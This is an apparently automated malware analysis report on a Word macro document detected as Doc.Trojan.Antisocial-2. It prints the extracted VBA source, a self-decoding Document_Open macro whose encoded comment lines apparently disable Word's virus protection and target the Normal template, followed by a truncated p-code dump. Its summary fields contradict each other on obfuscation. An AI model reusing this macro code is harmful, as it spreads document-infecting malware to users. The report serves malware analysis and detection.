Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8401b6567e466898…

MALICIOUS

Office (OLE)

45.0 KB Created: 1999-08-06 18:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 03f5ae7adb62451c7e829d67bc16d3b7 SHA-1: 58c7ded28864c1f2bca32a56c88ab89b1781b174 SHA-256: 8401b6567e46689821c4879bab87aee72b7288a35c70c7619d371f119f0aa5c4
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The macro code is heavily obfuscated, making it difficult to determine the exact payload, but it is designed to execute arbitrary code. This suggests the document is a malicious attachment intended to deliver a secondary stage malware.

Heuristics 3

  • ClamAV: Doc.Trojan.Antisocial-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4656 bytes
SHA-256: 2554fed459dbb7867468640550d1644817bece7964834677eeb6a29e0ea3f930
Detection
ClamAV: Doc.Trojan.Antisocial-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
For d = 6 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
'6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6
'5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5
'5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj
'3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800
'1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%
'7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5YlwshjlSpul'k3').)'-'m'-'HA'Ul {'k
'7TJ'D'JT5Spulz/83'JT5Jv|u{VmSpulz0
'6GJ4JkrkzkRotky&72&GJ4Iu{tzUlRotky@&GJ4GjjLxusYzxotm&SI
'1OU/EfmfufMjoft!2-!OU/DpvouPgMjoft;!OU/BeeGspnTusjoh!ND
'4EgxmziHsgyqirx2WeziEw$JmpiReqi>AEgxmziHsgyqirx2JyppReqi>$Irh$Wyf
'7.[ol'Kltvyhsp�h{pvu'Vm'[ol'Kltlhu
'7.[l|mspzjo']vu'S€z'Rv}pjR

' Processing file: /opt/analyzer/scan_staging/b0938e1c96f242e580b132dd1aaae66c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13703 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #1:
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	LitDI2 0x0006 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St C$ 
' Line #2:
' 	Ld d 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #3:
' 	Ld I 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	St False 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld False 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	Ld C$ 
' 	St A 
' Line #4:
' 	Ld d 
' 	Ld A 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	EndSub 
' Line #5:
' 	QuoteRem 0x0000 0x003B "6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6"
' Line #6:
' 	QuoteRem 0x0000 0x003C "5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5"
' Line #7:
' 	QuoteRem 0x0000 0x0040 "5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj"
' Line #8:
' 	QuoteRem 0x0000 0x0042 "3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #9:
' 	QuoteRem 0x0000 0x0042 "3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #10:
' 	QuoteRem 0x0000 0x003C "7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800"
' Line #11:
' 	QuoteRem 0x0000 0x0069 "1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%"
' Line #12:
' 	QuoteRem 0x0000 0x005A "7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5
... (truncated)